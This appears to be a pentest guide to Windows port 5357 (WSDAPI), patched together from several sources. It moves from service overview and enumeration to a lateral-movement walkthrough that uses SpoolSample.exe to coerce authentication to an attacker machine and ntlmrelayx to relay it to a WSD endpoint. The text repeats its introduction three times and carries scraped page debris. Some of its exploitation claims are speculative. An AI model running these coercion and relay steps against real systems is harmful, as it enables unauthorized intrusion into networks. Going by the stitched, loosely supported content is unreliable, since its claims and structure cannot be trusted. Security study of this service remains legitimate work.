Port 5357 is officially allocated to WSDAPI – Web Services for Devices on Windows. It is part of Microsoft’s implementation of the Devices Profile for Web Services (DPWS). Think of it as a "Plug and Play for the network" – devices (printers, scanners, media servers, IoT hubs) announce themselves and their capabilities via SOAP/HTTP.
By default, Windows 10/11, Server 2016/2019/2022 listen on 0.0.0.0:5357 when network discovery is enabled (turned on in "Network and Sharing Center").
git clone https://github.com/ianling/wsdpy
cd wsdpy
python3 wsdump.py 10.10.10.5
This sends a Probe message and lists all advertised devices, their types, scopes, and metadata addresses.
Example output:
Device: http://10.10.10.5:5357/wsd/3f8c2a1b-...
Type: Printer
Friendly Name: HP LaserJet M402dw
Metadata URL: http://10.10.10.5:5357/wsd/3f8c2a1b/metadata
Many devices (and even Windows hosts with sharing enabled) expose metadata without authentication.
⚠️ Always have proper authorization before scanning or testing port 5357 on any system.
Port 5357 is a common sight during Windows penetration tests, often identified as Microsoft HTTPAPI httpd 2.0 or WSDAPI (Web Services for Devices API). While often overlooked, it serves as a critical discovery point for local network reconnaissance and legacy exploitation. Service Overview: WSDAPI port 5357 hacktricks
WSDAPI is Microsoft's implementation of the WS-Discovery protocol. It allows Windows machines to automatically discover and communicate with network-connected devices like printers, scanners, and file shares without manual configuration. Port 5357 (TCP): Used for HTTP-based communication. Port 5358 (TCP): Used for HTTPS-based communication. Port 3702 (UDP): Used for multicast discovery. Reconnaissance & Enumeration
When you encounter port 5357, the first step is to confirm the service and identify potential information leaks. 1. Nmap Service Detection
A standard version scan will often reveal the underlying HTTP server. nmap -sV -p 5357 Use code with caution. Copied to clipboard
Expected Output: 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP). 2. Information Disclosure
Port 5357 can leak metadata useful for fingerprinting the target.
Hostnames & Device Names: WSD often broadcasts the actual name of the computer or printer. WSD/HTTP requests
OS Fingerprinting: The specific response from Microsoft-HTTPAPI/2.0 can help narrow down Windows versions (commonly seen in Vista, Windows 7, and Server 2008). Vulnerabilities & Exploitation 1. Remote Code Execution (MS09-063 / CVE-2009-2512)
This is the most critical historic vulnerability associated with port 5357. Microsoft Security Bulletin MS09-063 - Critical
In the world of internal network penetration testing, most hackers focus on the "big three": SMB (445), RDP (3389), and WinRM (5985/5986). However, subtle infiltration vectors often hide on less common ports. One such port is TCP 5357.
If you run a nmap -p5357 192.168.1.0/24 and see open, you might have stumbled upon a Windows service that is poorly understood but potentially dangerous: WSDAPI (Web Services for Devices on Windows).
This article acts as a HackTricks-style guide to port 5357: what it is, how to enumerate it, misconfigurations, vulnerabilities, and how to abuse it for lateral movement.
You have a foothold on WORKSTATION-A (192.168.1.10). Scanning finds 192.168.1.50:5357 open. Unauthenticated API abuse
Step 1: Coerce Authentication
Using SpoolSample.exe:
SpoolSample.exe TARGET-50 AttackerPC
This forces TARGET-50 (WSD-enabled printer server) to authenticate to your machine on SMB.
Step 2: Relay to WSD
ntlmrelayx.py -t http://192.168.1.50:5357/wsd/endpoint -wh 192.168.1.100 -smb2support
If successful, you might get device control or even SYSTEM.
Step 3: Command Injection via WSD Action
Some WSD implementations accept a Set action. Fuzzing the metadata might reveal an action like SetSystemTime or ExecuteCommand (rare but happens in embedded devices).